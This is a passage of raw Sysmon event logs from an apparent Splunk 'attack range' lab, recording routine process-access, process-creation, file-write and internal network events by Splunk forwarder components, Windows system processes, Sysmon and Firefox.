Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.214{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19F4-6216-5505-000000003902}2436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.215{4F8D34B0-19F4-6216-5505-000000003902}2436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:44.167{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E6C81F4C79F28B693CB9AF98C486EC8,SHA256=CA2C059D492111637901C7D4FA0C06F2EDCAD7D2764B661111FCAE44BA3F1F5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:44.329{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=A228FB884927A318FF3785AF16901C97,SHA256=CB4FB53AEFA644465D6AA3D243BD256ABB051FB32D8E0280C1ED30E31598923D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:44.013{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=846BDB047762E05F93ED609538889A3C,SHA256=4BE6A27874FB672FC78BEF5FFE8823FAA7D74D16BEBB36A3BCC82B6FA392A854,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:43.546{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51762-false10.0.1.12-8000- 23542300x8000000000000000223086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:45.730{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F700D1CE8B3EE3FD085EF0DEC183145B,SHA256=644FF4A29B6DEC9163D77D955E28713E43855DE987BB1FC2F4D74DCE44794CDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:43.591{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49599-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:45.028{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C70E74B80B40054E3DC01F7C7D2221E,SHA256=7759E0D93D190ED061065B0AE6BE4583181F633BC75265E8C500871017578A46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:45.245{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3EF9EAB0CD10D2BF471B0053C31111CA,SHA256=AC75270975125F643E0A8E524651DD59B23E5F05F6B4E89483FC8FD4D2BB3A8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:45.245{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6696E8F62DD93609F36948993538B61C,SHA256=B8C1FD65A4C685B1AE3EC12375D24FD83B502BA45E0D74FA5E22F0F42DC58BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.777{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F87302A398F2D18B11D0B3A12CE25564,SHA256=704B7DC259D12D17B06E24C3D0FECB1283FD340CA1814C7C624E7786EE181892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.777{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:46.059{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC20B0ACE8D80B3D2F083157EFAE67D2,SHA256=4A3793D2A838E1AB96E316F9C06861B940EB1F75180BBBB2921833BCD7E4F148,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19F6-6216-5705-000000003902}3188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-19F6-6216-5705-000000003902}3188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.667{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19F6-6216-5705-000000003902}3188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.668{4F8D34B0-19F6-6216-5705-000000003902}3188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.792{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E7848A462E863CF6AC862B5D7BC91A1,SHA256=B1303A959419832330AF249C4D4068498A58BAAABAFF3A6F2FBA5904ECBC9ABE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:47.096{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA7944779BB4960029BDA9AE59499EB2,SHA256=CB18AC36378C63A61D3C6553F530D8DAE877E1FB543097B181A71584CAAFBA64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.667{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3EF9EAB0CD10D2BF471B0053C31111CA,SHA256=AC75270975125F643E0A8E524651DD59B23E5F05F6B4E89483FC8FD4D2BB3A8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.355{4F8D34B0-19F7-6216-5805-000000003902}9562408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19F7-6216-5805-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 